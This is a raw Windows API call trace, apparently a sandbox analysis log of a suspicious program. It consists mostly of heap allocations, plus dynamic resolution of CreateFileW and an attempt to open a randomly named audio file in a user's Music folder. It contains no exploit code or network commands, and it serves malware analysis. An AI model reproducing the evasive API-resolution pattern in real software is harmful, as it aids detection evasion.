Flags=0x0, Size=0x10) returned 0x43ca640 [0118.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0118.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0118.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0118.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0118.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0118.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0118.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0118.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0118.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0118.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0118.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0118.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0118.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0118.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0118.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0118.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0118.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0118.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0118.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0118.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0118.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0118.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0118.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0118.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0118.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0118.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0118.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0118.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0118.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0118.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0118.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0118.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0118.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0118.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0118.016] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0118.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0118.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0118.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0118.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0118.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0118.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0118.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0118.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0118.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0118.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0118.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0118.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0118.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0118.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0118.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0118.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0118.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0118.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0118.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0118.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0118.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0118.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0118.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0118.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0118.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0118.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0118.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0118.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0118.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0118.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0118.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0118.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0118.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0118.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0118.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0118.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0118.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0118.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0118.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0118.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0118.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0118.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0118.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0118.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0118.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0118.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0118.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0118.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0118.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0118.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0118.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0118.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0118.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0118.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0118.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0118.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0118.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0118.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0118.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0118.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0118.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0118.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0118.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0118.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0118.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.020] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0118.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0118.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0118.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca778 [0118.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca778, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0118.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0118.020] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0118.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0118.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0118.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0118.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0118.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0118.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0118.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0118.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0118.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0118.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0118.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0118.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0118.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0118.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0118.021] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\lJ_RJDQgish84bCgxK.wav" (normalized: "c:\\users\\fd1hvy\\music\\tg2o\\lj_rjdqgish84bcgxk.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0118.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0118.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea490 [0118.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0118.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0118.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0118.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0118.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0118.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0118.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0118.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0118.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0118.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0118.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0118.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0118.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0118.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d8c0 [0118.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0118.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0118.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0118.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0118.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0118.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0118.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0118.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0118.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0118.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0118.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0118.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0118.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0118.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0118.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0118.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0118.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0118.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0118.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0118.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0118.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0118.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0118.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0118.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0118.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0118.023] FreeLibrary (hLibModule=0x772d0000) returned 1 [0118.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0118.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0118.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0118.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0118.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0118.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0118.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0118.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0118.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0118.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0118.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0118.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0118.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0118.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0118.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0118.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0118.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0118.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0118.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0118.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0118.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0118.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0118.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0118.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0118.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0118.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0118.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0118.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0118.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0118.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0118.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0118.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0118.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0118.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0118.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0118.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0118.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0118.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0118.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0118.024] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0118.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0118.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0118.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0118.024] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0118.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0118.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0118.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0118.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0118.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.025] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0118.025] 